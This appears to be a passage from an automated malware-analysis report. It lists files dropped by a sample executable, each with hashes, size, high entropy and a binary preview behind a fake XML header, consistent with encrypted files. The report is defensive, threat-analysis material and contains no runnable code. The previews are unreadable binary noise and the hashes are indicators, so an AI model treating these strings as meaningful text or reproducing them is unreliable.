..`p}......<f...>>..`.-....B.D.2"...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3505
              Entropy (8bit):7.953554941077673
              Encrypted:false
              SSDEEP:48:2wvzqjI2hneFTdxx/eskj+3B9gk6w6vobD5uQTv7Feb4Z21X+jIe1Yyp1uyjoc2Z:2LwZ2uB9V6w8eD5uevE4Z24pldy
              MD5:A66D62A2017D5716B2A28B732C072AEC
              SHA1:CA2D8D5F55720D3EE2FBD7B4EDC09B30696CEB53
              SHA-256:AE1749BBA62F28657DF727784ABB65B02E2406C4FF8B49C337FDEF5B471B6D06
              SHA-512:BAC8B6E9A5357A2570250C70B90FC54BAE41C4C1E08B668A0E4862A0965E6616D5D9744E79BCC4D4C1F85C95E0F581BA7E46BFC5BE3FED412E215F1DC87BD4C9
              Malicious:false
              Preview:<?xmlz/Y#..+....[..._>....&k.V...o..,pj.".q......."..|..d{.n..2l.>.h....B$.l'v.T...F.........C0..@.'...5!n....;U......!.$...0..3.,.2....S.t/j........iA..S.....5.2.d:../:.....s.6.j...s.@t}.{...'..LD./....kH1.n?X.{.n..........."B...yMW....)8.w.-.(..Yg.Y.r@n..C..>{..C.-[4K.Y..Y...k.G6.J...~..OLhJ...V..CBs...t.."..q.{}z'...O<..P...o.W.d.0..+.................?..1.H+..!3G...!2A6...v...Q.sb.{X.}t..I.a..U.5.9..)'$..f...h(.......w.<...#[...p....0.p.s`:...%_*....F.f#...u.!.u...gB....9...8..g|r..'.h-X..z..R9..nW..*.q.L.J`eI.P...n....0.o.r..U..V...7x"c..u...)=asf..=.,..E..dPm..U...@..X.Fw...W89Gl..+. .\89.....O.......[+.H....|......e.N....'.I.rLw.=.m+L.1.(..X.......|?.E.k5.nil.@Wp.....z.X.".<*s.*63..A.~.x.i...2"bG.G...*..s..o.{tg...\9.......~S.Q{.....x.c.......n...^J2.#.+./.g..[ .<.].3.D...[.]a.....w...!m..%5.Y...3.......:.....o..+.mc....>..O..u.7$..MK.@S^.7...q.Q...F.r....*c.s/e.F.dz..&.I:R.LW.T.#...,...K.3.r;ler.. I{....$.aL="+Q.S..'.O.X.POj..oH@Dt..x&1}....<2.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):7.7772043527488
              Encrypted:false
              SSDEEP:24:dxcl0TZltq/rs9THIN47sVOkJQnZPd+bD:lT7sVlcf8D
              MD5:1AEDB026E2B26A8BBBA263036971E4D6
              SHA1:16ABA04102C0E44C17FAF14A02C2536124230EAF
              SHA-256:611D90567EA7CA933FD10730CCFE5B3C118375C2FDA0A6A6EF65113A74CFC59C
              SHA-512:6A9084380E13E8DD6CBFDC1642D8E6D287DF880F80CEFC53068C889639BE9F3A9C2873405F872D89665533C3A723EE3AA1D967BA04BD475BD27774F3F71D664A
              Malicious:false
              Preview:<?xml.F.Df.bAp../.`...e^.?.....bqrw2.F.c....aA.X...R...u#g.:..q.@G.......e`.U..Va....../>...p.V....!..J.6.|G..YMFoO.l.cw4...'..9.:.&:...A...P...U.}S.J.;*.u....E....D..............,......^`.#y....TOR.......D.3[0....W.K.....+..I.`G53.^.nS.~...UH+..8...H...Z.d.>D..ABE..F<).(=>...:F.\=..u.b.;.Q.=..^..u.......3.jyuj...L...u.wKG#y.......]ZN.....}.].&./9y.$.D=...N(o.@.)Y}..4.....!9...x....R7..^.h.|9.....B....j.=$V..V.?KS..7...w.....^H<K.......}.v.........7/..]z@..vM.6..n.CG...B.]w..B,).\...z.....P.{.ws//......,..a......A....k.P......65IW.k/..L.....D3......:u.zU93.....a=.?.?...>.c.b....$...J.....y;^...w.9nQH8k...5W..m....|.....Q...Q..n....3<.g.b.....G...>K.tt.,bg....{Q.5...Rvmp.e.L..u>....... .`vr.+..^...x..t9.@D.p...}.Z...5 ...#............CV..D...R...r.Fd...qv..>.E...j....!.uS.2.W...9..QS.....2....7..Y.eYm..rN...Z.ce ....o..a)QE..Y..1_L../HT.7..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2983
              Entropy (8bit):7.945198847983946
              Encrypted:false
              SSDEEP:48:aqE7hJxIFka4sK86JPlAMPgYnMpzLMXUPnBMGARkxGDzIqEZGGBuMF1NFFFeeIhS:aqE7hDIFkaq8alAMPg5LMWwSGwqEZlBX
              MD5:B6629610A071AFAA8E72D12285327BAC
              SHA1:2277BAF79B02C80AA51ECD8B015D7E610431170C
              SHA-256:EC2EB365ABD4687CD189783FBB6CB90D5B5A9CB3AA9CD5CA1FE662CD95A02997
              SHA-512:4596392E41952CCB882BF8EB98BE79DF28A04E0953ED31D0E83308CFA212D73FE2016D0ECE2C65CEDFDD4FC473154BAFAFD1E03E9040C0DEDFF82E46C2E6C840
              Malicious:false
              Preview:<?xml...K.x...^..!.c.Y..;.........i.k%..#.....7.......fM.g.!.9.;.......'.?8.........dk.CO...E.......,^..w.R.s..I>.C..+X......\.".......)p!..Ea.R... V..b......T.de..n..N$.....y.jo.k..N..N.p.....V.}..g.6."....T....4q.....S./3.z..=.rB._.^....ke..s..kP.^).3op....1.j1<......3..../..Pi....s.........'....N..............U...`...<....R.A..O....S..5.m.!m......K.........I......ODIT...(......SX4m...CW.i].....)..K...T.18..?.p.w.Q....,.."rw.r..P.3.C@F..=K3..Z.t..{....C7..l....B.._..xO... ...o..6 ....0...../....d.&.e.y..q..Q..i..)..e.Lej.!db-P...R."......_..i~P...m}..A...E.....q..|B..Z...l.~.-...fs....==.74....)6w.....,n......;..r."u. .^.....S...u.PL.._.....E..|......k>~8.#..+.P. ....f.D3.E.t.5....oZ...=^..e."X.,.\W.....2...y[..1S....{U...:w.^......z..I;......l.&.j....O..v..l..+..G..\f.d........h=..V...:lZ."............S.E......J.8..@3....|.I.........l[....|..c.t...;Q.v'i..7.A..\4..xl......4..+..3.;.Gv.H...Mw,..{TmP..3.z.4..7.d.M.% .xO!....\,...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2487
              Entropy (8bit):7.915294710073479
              Encrypted:false
              SSDEEP:48:/As74yLvZbTEOLLlhgWX+6Z227KnwpLeQ0wHRsJjhXVrsqJrxF/M8D:n742ZbJWWXvZ228IL50mRgjTrsqdV
              MD5:C3DBD8A36E95F0D7741D61C2A7626A19
              SHA1:D043247DE41049C05D966E9CF43F4072DAB8E41E
              SHA-256:6D463244D84CFC760545A97A3D2BF5FBF464082110D6A601B730A91D24CFBF71
              SHA-512:96D45390A6732F930E4A5ABD549C556E3E951F9564B38D6F25282DC71FD1388D591BACA36D4292E33F54B05FB6294E690D4D97CDB0D2E278AAAFD2B332009B7B
              Malicious:false
              Preview:<?xml;o.&..|d..X.k..K.{H;.....\C..^.s....nx..w......*Y}..L;v......%._.`.4.L91;.9...|)...RkSAe....K..R.OB..........3&O.'4. x.l..aL...4..$\.<../.. ...I1...z1.j..;....!^..$.A.....M.c..#]>W....a.u.l.ns y....;.|....x.Rq..\..0...v....>..6._...*....+...),........!...i.!....V..~%t.S[g..2....J..Z....|....V...=.....V.V..+.H..y..8........_......P..eg..".w....4.n..a8...r.2...B..... k....p.~.E..dr7...5v..m6..zQ..G..........9.5.H/0..r$..F..3.....Ft./.).U..!.6...eR..K...7..G........l.]n.A.R8.Fd?98{.e...`...v.#q,DO`L..U...<..8...u.`e/...Y@D..=kFz...S.!.....p...a.D...OP....;.S..K...y..;v..O..9..).[...|..F..2..."Ov>z.$%..B4Y.^.4kS..T6L.....,....S...I........t^^.....z.O6C.L=..!n...O.Q...~...D.q.zO...v.......t.L)v6S@./x5.9.{.....-.iRr..:..'L|...=.Q)...qlX....Q..>".Wy"f.R..G.-...y.^....3}.]........iMNd..u...."......&.(..!....z/B..g..k......a._d[vL...d.-]9...4m.6.q..(`2..t..(.?.9.W...VKh.%/qm.....9....FZ..Z.[.Rk.....T..._~...9>x,...<..].,.|......^..>...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3132
              Entropy (8bit):7.926673224991909
              Encrypted:false
              SSDEEP:48:P3QyzYEoUAwRkYyyoVxAfL8HzXTjz8pnaFb1Jd3NBzkRT3MjAeuBasAsR8D:vkEBNyy20L8HzXXg2wMOcj
              MD5:F7658DAFCA92E1F172A1A8CA961F4B55
              SHA1:CBDBF57BB4E86689743239640076A937287317E4
              SHA-256:602C0A9C99E4AB7E132B94E953371CB0D6FFE5CD184674CE7E70BCAE1530E61E
              SHA-512:8C7B256326FB3B97944524E5F4A84775754EA006F1465B4116A9FCA02422B5DB3CC0704BF89C049DB99347DC826C9BA6A4685CD64B9E39AA68BC97E0D3554C0D
              Malicious:false
              Preview:<?xml...g'..h.UQ~........lr...?T...E..._b1...].3>:0.U,.B....f.;......`h.H.....L.c.JF.-..ed....Ien..co....#.......#.$..G+.....y.B...L.K.rmk......'X0<m..._"B...w.y...`2...,v...X.]=.;...N......X.d.;=.VV..2.l......7]...i..G8*...y!.<..G.p....hR..f.K.`q7.....f`@u.-.$..7....Ic.Y[c.}.Tw.......'.7.c.'..Xr.d...S.".i....v..X..KvR....43.eU..........3..1M2.G...;j.G.).n.....h0s...4....h.s.@...L$~q."..Q}... .O.q>..|...U..Tv.Tq!.qv..Q.z..P._.].X.......%k....l.1.=..{..Is((^...ll.{..=Qa......}..?.E=..Q........U..[....2.vb......4...*.Yo.Z.8...QX}..+.&..3.+..%......V..z^..{..^Y~.`.-KZ.NX...+..../=..=o..+.?fh~.l.V.}.....NF.<S}-../vO..-.d"?..PK..E..... j+....0..QyQ.-...^...9mq.}. .N..qd....=1..u.z.:.=...,..+.s....>fM8..s<.N?|.Ji...Vs1.....8.:.>4.N?\..............c.....K`h.y....GI9...PT..Y......Q!...\U..sw.....=5F.8./..^.]z.!_I.. \.+D........~rM..^.;...$+..(....ro.%..p...a....._......M....Oj....6........!...pS...]d...R!:...<.~)............?.kC.ts*.X
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4968
              Entropy (8bit):7.966404396185806
              Encrypted:false
              SSDEEP:96:xKp+KRZuv8uqd7LKsIbvzPpwxJUmzDf3pFlj6O0xau2l45H0UCH:xKwKRW8uk72sI7VwxJUmv3pFh6O0xh2d
              MD5:20DA325AC19054A0333D9B6388B8A83A
              SHA1:EEB58B50AB4A27EA2C287F81032EBF0DC4F54BB9
              SHA-256:10185D4311A1C2DD9DB0C335F34A03B0B5334653BD47893271AEA0E4CAD5BB2A
              SHA-512:2D296779F8CB009A426D3DD67DEE39D51458ADFE5DD6D81BF79C290921C39FA2A741CC4D4B2F769B291F2B1D8506A0B0EAA49D7FC7616AC6B18773348EAD8608
              Malicious:false
              Preview:<?xml<u...._.EqC-......|F..f.`U...]....>.r.J.!a....... ....{...c.w.........g...#.e.P.......W.x....4...&..~....n.La.<...6...ex!.O^&. x+`!b....;..+.4.O:(.0..]e.........c.^.....-..M'..K..oO.#..9.dk..\.`8f.M..A6G.MZX.oy7......$..2n*.H..*..8.....V..6.j&...gt..c......v.O.x...0..`...n...kx..r.....8.1g...C*.m...k..d.M{...r.<..a.:z....<.....A......S...JhD...#.Z.......e....8h'E...k.$.8..._^s"......;F.B.y...5....K...C.r+.=.&..#.rL...X.X..?ye.]a5..}...V.....`6...r..4W..qB)..r...)F.+...._.y.."..Y....&&|.ED.......:.kkE3e..`.^....D...r._).'.].+..DU.h......9./..}i......O......Z...'...jz.#...i.......(.u:...../z.........|...Lp....\.XX;.j7.~.sI.[.CP0U\*N....>.A)........>^G..`k;<....#"^..&.f..s3C.MVV........I.Q..F.....6...3..-..JD..=.q.P....).....=..]2@.\....G...s.B]-..S...E[.g......z...0.....Xzv..\.*....7E;.-..S.!...m.....Vj.!z......za./R..h....T..n..\`K6.........T[.\....4.;.....1.$.........I.....i.C"2Ia&..<....ge.;.:......b.>X.M.1..?.`7...E...Q.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):7596
              Entropy (8bit):7.969305933231493
              Encrypted:false
              SSDEEP:96:IV5sExKyvUzfCO7fat2iUuBJMjdObSaKfZAApK7YJZtCk+ETlOAEtfEpv29VlNl3:s5s7DDu2iBJMZRzw4ZtpVOAE6v2DflM0
              MD5:F06A03AB340C9DDC41F3D28BC09D4BF6
              SHA1:35170470236544A6281E3163CDF456ADF3F259CA
              SHA-256:4D8D81A48D59232068071ADC98594B2FD12F74DAD8FF7925914A2AFF977F53AD
              SHA-512:5633AD4F7C10F3834E0225AFB86FE5A7D1478278651F3C0D3A4AEBD4147E82FE34EA11D7D4DA525A2BE99E039BC643B331EF51462F83E6E1A86A38EDD0560B8C
              Malicious:false
              Preview:<?xml?).`...{....(.|.....CP ....$...d.VN_....Pf..."Q!">..].w..\..}...D.&7...9..t.).MZ){)S|.4....Dl.. R...t..0;...Y.`.....x..#.c..+2'.1.]....,....=..>s.#R....~....M..B....h...7,x.;..1...l.e..q...b.....w.:..=.<g....HJ,....U.Px.*.......v..\^R...&o.k9.G...yX.$By$.}t.m..w.[[A...2...m/.......=..r;S$i.....c'.#..5.Z..]..v..b'...q..Z.....Ie......+..D.<.0....u.>{.qx......h..'.....ZoR5t..n....G...<..z.........1..\.|"r.I..B.t:e...sx._@...aU.......9....:<.b.t...^+........9a.mp.K..G0#4PY..+E..f..<....2.......~;'#o.....u.k.2}l.88.D........'(.#1F.E..s.5..,.....+.S..cDK....z.:.%a.M.\.1.4..i.,....c8f..L.MX....i_.z..pJ.E.;E.r..k8&...D.....U"....F.$|{..Q..0@....st.a...Hd../.....".W1....c{.D8..M.27..........^t..U...f.Tb02..h..G.yt.a..5L.B....#)..j......5...|......Z-LXo&.`t........."jZX......... .......J}...eB'..3]59b)....;...|....g.0.........6.... ...R_.....1..5$..b..j.."K]$%!.p...;A.hM.Q.............$......^....>.vM.....a....i.esl...f$+..!...J..e'...!8#
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):7356
              Entropy (8bit):7.973583312545989
              Encrypted:false
              SSDEEP:192:9uPjDluGLNfox8P0+xWwP3Vc++UAJkC3gLjeq2a:90R5pI8P1AwfVJ+BJkC3gLjek
              MD5:6661270EB88A6ECA258F5ADCD4B99E58
              SHA1:DC923624D7EB4CDB7469D37DE372878289E23084
              SHA-256:C8D33FE9618ACA0D98851B98898D9761C2D39BA97D5F1B4A469E3CC22E4E3EFE
              SHA-512:966C22FD349701DA4D782FEBB1FF13E5B2909D95982FD9EE71DDF4F5B942CF24CA8ABA6D665FEEF160DD8CD5A8F80DC22A0D37A8A3A4A9BC0FC8E55EECCEA7E6
              Malicious:false
              Preview:<?xmlpQ..C...Qt`.jA..%i.1...e6.k.1;.[..g$..%.i{...%..........B%g.W=.inQ|_.. ........).....c4.a....M.w ...B...R..d7.!\.v...!.V*.d.VRn.9..k..'.p...L.y!nq...#V.E......c2.HhW,.....6.'.w'.#.6.m..2..[...dBP..f..R..`.t.g.d.$g.......8.h..:[U....tL.+..,7.%..Y,B,.*..c=K4..a.........&....%^8...b.4...c..^j3.RMk..">...b...bU.;..O$.....}.S.....A.....5..$..<.l...g..A.......\....sL.(......|K ......@...?vp.Xv..DZ.QM.ON..d..T.[..G...l.k....;..rZE..e.....X0..1\.d..5LN...!?T.v.....v.ut7.D$...F./6.F..?.....$.p.C.;..9>t..l.....I7..9!:.P.[...q4.#..!..*..\.....S*.=ut..0.....I.[..:..{..8...U...i...m................P6.L.....5O.AC/5..pbA.6H..o.Xw.;.p.<.r.S.L*m..9....JE.......hdl...a.i.B*.&.XX.%@...........&-..K......7.A......(.?..&...(W.p..r._...c......1...e.&hO..%.........}I..z...g.,../.!.I"L2-..d.j..[.u.O-....<..V7....&\.-H9u..!9.m.JV..b.c.*F..Z2/_.;..........=..e..9./....[...t.Z%.*l..+..j.t..m.......p..9V.B..../.".p..g...V.&k......v(.....e.Y,=;..3..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1551
              Entropy (8bit):7.884863816999331
              Encrypted:false
              SSDEEP:48:jHr+YftmSeXckuZU+mh82tug6HGQoQS08D:dcSeXjZh8W1Q6
              MD5:DAC31D1E32FC8A6D9410640929C9FD66
              SHA1:86AAB15084FBBD3F5F91C8D724EDE54EB4168B64
              SHA-256:359D846525B8830853F6F3460764EDD442796D5EF4A578A70F400368063F05B3
              SHA-512:23C2B9DB2012993F71137210B55F8A4035B059B4C39F9B5D5E1CBD4FF6F6F6DFAF7A674952AECC24AC95A088E303FDF65B90AA6FFF47279DF7B20EAC5D2A9C63
              Malicious:false
              Preview:<?xml..~B:.......d...W....*.h>.V..|^.bn.....&.{H$.>i..y.\..X....._74ZiK./...SW..c..X....{.Zb..X..M......b..s..@~....)...a.h..N..R...A...J@7H(C....>q.v~.f.i...|....W...`c3...U@:..S.........ng..#..Sk^.TH...P#\F..A.Gz....'....t...'."j`}SAkr.......(.i#M..Y]k...?.j.2.Ih..!U.ZzN..l....q''.q.J.%..}..X........E...p.B.....F.y.AV.*.u..h...{...|.#.(.u.W$..5.T.......!..^..../p.....K.w...|.........7......W..+{...z,7/&......U.d ;4..J. ....|.Q.P.&3.yL.six:.k...y$.!..+l|?...w..(..@hz...f..jj%.?..c.-...T.R.'.[M..8/...V..X...B....,...0...E..c...D.}...5.][.~Jm.g.,C.x...$..*0..t.!l.!.........@...X..V.....gBs^..PA..guY(..)..y...k..r.2..u.j;1...QL5.5..XW....).....PM.p..t!..6..`.t.xM..f*.Km..5"oZSJM.+..>BN>..Py..V...q%...V$D.@.|j....zbz.?..}..5...O...b%O..."...... ...*2..j..wq-...5.F3...@.{.. <.Og.,>f1.....(.Ct1..0..h=..57>..C(.....G.y.eM..ES.h.&..T.a+?T..q{D...|?8T.MP.I...Nn,.z...;/.|y..D.m....A.......*<..1|RuV.i.Me......@..Z.....g..N.YA?............c.).5..4.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1716
              Entropy (8bit):7.886633811234913
              Encrypted:false
              SSDEEP:48:ifLM8L7kVODEWcS/3BCs8T0eR5pn6wMs8D:iTLYVOEWX0s8T0eRznu
              MD5:B4F1BF3A7AE48516866560AE4DBDD85D
              SHA1:AD7473D7B589295EE3B9581D50AD044685BB88B0
              SHA-256:D04DC837521166B0C0006CA7BC10C8CB0919EA8EB60D3AD52B20ED909A500019
              SHA-512:0A40A9AD88B76425FE377205405F57A97672D4535DC91550F9C03C50B6634A2153BDAABC97C77891C7B343B05D282EFFB7E4BA97D080487E106BB8D9E66E074E
              Malicious:false
              Preview:<?xml...p.....h_.i.}.p.f...."A....h..u7h......g..T-..Kloj...|..9.!.!5.l.3..+^.Hw*.....3...#...x.@K..nW...J....".....J.C.,^mc*.[k.Vy.]....~...t@...vE.<.H.?..9..B.........d.OA..!....{M...|._..]........._ztS[.5[.m...1,.C...*~..c.Ds...V..>.4..,....XS..8nf%/.+x..(M.......d...MqV..2J.0..R..:5z.$=......*....Q.Q*...$..&..#..}.r....9.o^.J"C..N...1.....O.s0Y...X...4.......0.B.0_...+..yv4......Q..Z.2*....wx...;....]J.W.. N...M.ne...#n..d....==86Sy.........jb.GO...../.Q.....oI.,......V.y.M..Z.Q."V$.:..0....w......dD..?.:NX.Y.y{.%.....I. ..<*hr...C.+{J.4..~.<./F.:..Z.-..r4..`...::.%...f.2..t..p.w.S)H..7x..[2..#%.}.B.dK..>~...F....+$D.P..Y.....!...Z>].m).7...v.f...~oiB....i....B.d...sJ....Z...L...|..3:..1.. ..;..6*..[.J......(..U..%bVMA.d<.....%(...L0*.2Nb.*dK7..s.!.....)N.Z&.~.......u...Q"....#....`...c.[.....5.-/a.:...?......$Y<..y3G.oP....J.........Bo..V....%.5.........+...m..YKd...$.m...".\.T...3.)....\.(.Z.j..=..........5...v..OR....T.. .#..{
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.878586638759168
              Encrypted:false
              SSDEEP:48:SVvCbULHEYS+5fpPXT48e2mMlNqz2M+TbjAQFRjjR8D:SVvvEK7482Knjy
              MD5:BA12DA0A27A8F850CF752754B38CED80
              SHA1:64187A549A3CF22041CF7129C31EF5DF84D5B8AC
              SHA-256:61DD421CADFD95BEF426969FFA171913473F4DE5C4C6CD7EDD0080BA33F77106
              SHA-512:2122B5D5444BEE37A4A2F13293C894AE2CAFCC72D6C9862A94AABC009FD2DE17795359E1ECB579C8EBCF2C0E3282076CACFB6AD1062E72FE1E3B01358F1767C9
              Malicious:false
              Preview:<?xml..K5.o..6..\~7....;..G...&.{N.i... H..L.i.M.nQi.......0.......|<..m9..l....~09GO.z'UWR..{7S.-...@3M.cO.0/..t....DkVQq...R.x.BT.PL-.1.f....p......B....,.".....S..C.....h....I...'.......M..V..: .`:.e..Uve.RW.m.D7.....~....GP..A$J.o.Z......(..n.O.....{.b...Q.....#..C(.@$.P.m~.."\1t..d>.R#L.....U...wc1.r@IB ?%B.7.Sm5 ci.......^7/xl...; .`.3a/...P.....:...y.z......nh.?E%;d..|z....+......Kyd$).?.......!rwN..S{...p..Mz...%....4...r..Ft@S.c.ZaD.....@.I{..S.<.+&`].{...XB..a t.n_#h..A.(..).j.2.k..Bh.....[........l......[9..oG.....t(.E....p...../..@7p+A]"Q..n1&...,].....=..Y....gT.a..#...X..7..(.j...Y.d..z....,.b.L...=#.x4^wv~...Z......F.3wST..B...U...4&).SZ..w..xD......V.3..B.Xg-5`.....XW.{.......U>S.q....N.p.....y..1..0..+(..{o.`2\...!....V.x....qP../r...iz...."........].i.3r}o.'..c.K.8'.[M s.p.....P.".l..{!n.....F....D.v..B.....m..5.../hM.2...-8..k)i.ns......x....@...D.o..d..|u.z...o.a........Z....`=N..d....T..i*^.h.1u_..+m.....9.....$.s...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1448
              Entropy (8bit):7.851309437595913
              Encrypted:false
              SSDEEP:24:AO+GYzZS7A0eSLvP3bBVvbI4KTcGaubSOk0GIm0pHdJowl4stKTiyE1C8+CCVkN8:M5ZIA0rvP3bB9INAGEMmQcnsYOMTkNj4
              MD5:8F2B3A2F174CABA9676B57CD53C6F36D
              SHA1:AB3B586540D4D33D897290AD44902C50D433E2BD
              SHA-256:ECC0DF175FD7D28E27856E081ABE3AB84CD725F60D1A5E3E527BCBF0B3E7D529
              SHA-512:AF53834E0B0ED6C940E41E81888C3876DDBA8A21A642BD6588BD3073220621877E5629BADE1F6C474BA965F20A5B76804976A800E8A0002C72223F7D26604985
              Malicious:false
              Preview:<?xml...x y..?....5.;;A..!....{Q5....?Q.q....\oA.....1....pXU..........C..5.#...gf..b.((...^....H.wsL[.0...v.F_.....m.5..s..i..".c..Z,.!....<..`~....U..6..C.2..L.o....u..X_._:E.*c.@f..4..9...`]2{QT..llwEV...l..Nxv..(..`.8.o6.q....F.W.U./....V....c...SE8..o..G.4.8.....!..0.G.......<....@...nr..r+.......[.k.....Oa3.|....%....._..'...l.[}..5..`?.i...'..BZ..E`=....&...Os.6...*.'e../....3..C.M|Two$.....cC.].$._aW....=k7s..xu..~..'..~.:...Vj....mr2.......d.U...m...,...e.]y^R.l.}.Y..=8..V.t...$.0..B.....Y......7.....Z......Zn......w..4.O..#..XV`.3...,.^DGq...H....`..L..qw.L."..b..^.(.Q9yE...X.,....g...St^e...._.O..|......Z4BV.-..E.....OQ..........Bw<.`......q........$..5\..V$*..A...[........KJ<....X..r...W.U6............7..\.4@0......Y....+.C.....$.0.#+..n.Q....'Sq..O..f..6...0........G..fW.5..B*.9.,....C(....D.....S..\&?.-..gB`U..Es......ern..O[~.u.n.+71.`T....`.G.{......m#.t-....Rv...2.U............".....CY\..rU.aXv....H.........*.........
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1419
              Entropy (8bit):7.8619492127513855
              Encrypted:false
              SSDEEP:24:cvs6GTebavi7vQsAXN+aI+JCOOmv5hxov6uOxbkTS9AUlBPWkoV9xCPLd+bD:cvTGTemMvQsw+fmvT+g9Rl0e8D
              MD5:F3674D1778113AB1774F9CCBAFB9E371
              SHA1:BFF61BDCB126104C30C9EEE6C497CD5A8EC6DF3E
              SHA-256:3F074DE2408EE2A7EE0946D0AA16A523E3CA4D5C4A226BFACE1F4269B6D4EC1F
              SHA-512:F486AA68B9B951F5D7C53EF8F8CA36F563BF765B2021FB30ED652C8A5BD862E5047096E3583778E42658A15C6D411B841D337872E52D9684CE037ABD9D3080C1
              Malicious:false
              Preview:<?xml.?3.H...z...&..w....F...a....X?)...uW...Lw.33B...<QJT W.?...7.....y.y.#..S3..L.1..r....l6....?.().W.Z..d...V..8!][../Gp...H.........o...X?r...;....4.Z2.W..\. !...aTl ...H.b..(.M...*(v..hGJ#C.....Z0'R@S..|.F..o.i..#Bt..Z..B.;Vv...8.hW.2R.i....B......o}.:k.Cu...R.t.......s....$.+9..R..x..*.....;MV.U.k....dT....R.....0..".&.....~..v6}:;5|...d?.....h...z...f..a..9...+9......%.].)..}F.I..q. (._*gHQ./..0.6..5c...D{k...,.@.i..%..`.t..R.....''o.l.4...gsK5..........b...9.....NJJU.....H..._o.e.....N....E....$....;0AE......Bk..(....;..x...E+}6(.;."..'5.c...5....'........A..r.....o.L>c.......L..Rm..p.z5......*.}....`E...{.p...yG.$FV7.2/....y..<._U........E.vJ.......>>.s:>3(OFJ....)..u.....U6'.Y?@0M...i..tIw.#!.5.i..x...&...jE.K.}... ..(.M.pq5..gl...!....`.9........BR....$U....A....d.!..w..?.A.}....n..H5...@.)..........-Y..S.0....d.....R.Q=..|>.".7.V.J.WN...P.>..A3.!,.6Q!x.o...iK|E.i.z....e.....'.O..\c]EM-.q.....E...b*.O..{.&.....F1.a..u...).z..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1546
              Entropy (8bit):7.8538086785026175
              Encrypted:false
              SSDEEP:24:+657zdgOSFNpeTi2IkytL5wF6G9YDmOdgc5VuMCBR70jqLWNAIsJVUPd+bD:dlzulWi2oLwF6SYTdgKCBR70j6WyVI8D
              MD5:F212278AE7F8A8FE223090C741FCCDD1
              SHA1:FE39E3A303757DCDE2FAA75F7A215A2CE9C466DD
              SHA-256:C3FB9F5C9ED26A0B56FE3841720E25411ABCB23EE4154E19F2ECF3315DA590D6
              SHA-512:22C37B2025536C4A4C06F4AEEB32D1EFA6257FF772484E51065FA527C455793D3F969D8C5E03BB9DE5D2508153181516B0FE24956DC053908282E76108941E27
              Malicious:false
              Preview:<?xml...!c...?3.r.\G{.7n..K...Z.(..H....d.bU..M..r.\.2.V.5x.94-n!.)".bs)5..s_.)..#...bT...,bF.e.[. T......c...0oGY.@g.9.X....?0...e.Cn..#%.A.m.o...A.Y....M.]X.i.{.k..,.FVA.".1...[.J...l....n..5...p..,...%F..#.T..._.c....o..fXmZ/..f/.G..)..4.......A..(.....d.s.tz.w.....j{46.....7#...P+.I.|....R&Z.....c/..)..c....J...K...S,....B..S.....6.mG..G./.v.l...A.;.....hv.8P..._fa.......`...L....L.O.[...r(.gbx<;&nf.H..Fb8Y.C .^R.^.......Hv..wZ...3.......@Y...h;.9.......%^..q80.....s.T...n.7..%......X.=....J..\F..YK.../.h..}D.....:..v.y5boD...........dH.......p....<o.b.6....}.....9P-YvZ..:....r!..h..3.,.A..........<.#f.8Eh.............A.......m....,{.nX.~..f-.)....3.^5....+...e....l.u....V..}.m..GCJ.(-...C.Xe;./:.x.`..$.k...|........l.n0...s!-w...=N.......Y,.sAgQ".{...-X.G.1....=....&......j.5..B.gW...o..xBT.f..M....X.1$.z..8.]V.`.....p.....{...e/.*.V>7..[B.b...|l.D@.iD5.rH....V...w...`4a...'O%...f.>.!W..&S%g./.~..h....C^(.R.r.....O6v.E.b.."
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):903
              Entropy (8bit):7.726598763891144
              Encrypted:false
              SSDEEP:24:iyEjjCRcBZm35OEuGQEVExT3wFaeA2Cd+bD:iyEXCRcvm3NbaxT3wFaeg8D
              MD5:5021217D3D219F4DDD6190FF1C130625
              SHA1:D7F542131EB20230810A959DE59798D7B0C4B909
              SHA-256:E8FE3D501D2688546F02A116339AAE67B379E6E9950456C1D20E50AB6711532C
              SHA-512:A2FD415224CDF5BD41B98F57A3AD6B0EEBB6FA99AA6C16E54AF222994DE4FD3C984CFE4845B9D6A9AED1A1A75B93C59AF85E80D5034262B9B881D04B813ECD08
              Malicious:false
